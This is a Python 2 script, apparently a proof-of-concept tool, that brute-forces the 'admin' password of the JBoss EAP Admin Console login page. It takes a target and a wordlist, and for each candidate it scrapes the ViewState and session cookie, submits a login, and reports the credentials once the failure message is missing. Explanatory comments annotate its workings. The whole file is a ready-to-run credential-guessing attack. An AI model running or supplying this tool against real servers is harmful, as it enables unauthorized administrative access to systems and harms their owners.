"""
Bruteforce JBoss EAP Admin Console 1.3.4.SP6 (r999)
Author: @itsecurityco
Use: python bruteforce(PoC).py ip:port wordlist
"""
import re
import sys
import urllib
import requests
from time import time
from colorama import Fore, Back, Style, init
init()
start_time = time()
# Positional CLI arguments (see module docstring): target host[:port] and the wordlist path.
# There is no argument-count check, so a missing argument raises IndexError here.
HOST = sys.argv[1]
WORDLIST = sys.argv[2]
# Burp suite proxy.
# NOTE: the literal repeats the key "http", so the dict ends up with a single entry;
# no "https" mapping exists, and every request below uses a plain http:// URL anyway.
proxies = {"http": "http://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}
# Password list file.
# The whole file is read into memory, one candidate per line with line endings stripped.
f = open(WORDLIST, 'r')
lines = f.read().splitlines()
f.close()
# Main loop: one GET plus one POST per candidate, always for the fixed user name "admin".
# Seen from the server, each iteration is a brand-new session performing exactly one
# login attempt from the same source, with the hard-coded User-Agent/Accept headers below.
for passwd in lines:
    JSESSIONID = ""
    # Get ViewState.
    # The GET deliberately carries an empty JSESSIONID cookie, so the server issues a fresh
    # session every iteration instead of reusing one.
    headers = {
        "Host": HOST,
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        "Cookie": "JSESSIONID=" + JSESSIONID,
        "Connection": "keep-alive",
    }
    r1 = requests.get("http://%s/admin-console/login.seam" % HOST, proxies=proxies, headers=headers)
    # The JSF ViewState token is scraped from the login form. The regex requires this exact
    # attribute order and quoting, so a differently rendered page stops the script below.
    m1 = re.search(r'<input type="hidden" name="javax\.faces\.ViewState" id="javax\.faces\.ViewState" value="(.*)" autocomplete="off"', r1.text)
    if not m1:
        print(Fore.RED + "[!] Error obteniendo ViewState.")  # "error obtaining ViewState"
        exit()
    ViewState = m1.group(1)
    # Try password.
    # Form field values are percent-encoded with urllib.quote (Python 2 API) before being
    # handed to requests as the `data` dict.
    payload = {
        'login_form' : urllib.quote('login_form'),
        'login_form:name' : urllib.quote('admin'),
        'login_form:password' : urllib.quote(passwd),
        'login_form:submit' : urllib.quote('Login'),
        'javax.faces.ViewState' : urllib.quote(str(ViewState))
    }
    # The session id is taken from the raw Set-Cookie header of the GET rather than from
    # r1.cookies; a response without that header raises KeyError before the regex runs.
    m2 = re.search(r'JSESSIONID=(.*); Path=\/admin-console', r1.headers['Set-Cookie'])
    if not m2:
        print(Fore.RED + "[!] Error obteniendo nuevo JSESSIONID.")  # "error obtaining new JSESSIONID"
        exit()
    JSESSIONID = m2.group(1)
    headers = {
        "Host": HOST,
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        "Referer": "http://%s/admin-console/login.seam" % HOST,
        "Cookie": "JSESSIONID=" + JSESSIONID,
        "Connection": "keep-alive",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    # allow_redirects=False: only the immediate response body is inspected, not any
    # page a redirect would lead to.
    r2 = requests.post("http://%s/admin-console/login.seam" % HOST, data=payload, proxies=proxies, allow_redirects=False, headers=headers)
    # "Success" is inferred solely from the absence of the literal failure message; any
    # response that lacks it (e.g. an error page) is reported as a match as well.
    m3 = re.search(r'log in attempt failed, please try again', r2.text)
    print(Fore.GREEN + "[+] %d probando: admin:%s ..." % (r2.status_code, passwd))  # "trying admin:<passwd>"
    if not m3:
        print(Fore.YELLOW + "[!] Credenciales encontradas: admin:%s." % passwd)  # "credentials found"
        break
# Elapsed time. int(...)/60 is Python 2 integer division, so minutes are truncated.
print(Fore.GREEN + "\n--- %d seconds, %d minutes ---" % (int(time()-start_time), int(time()-start_time)/60))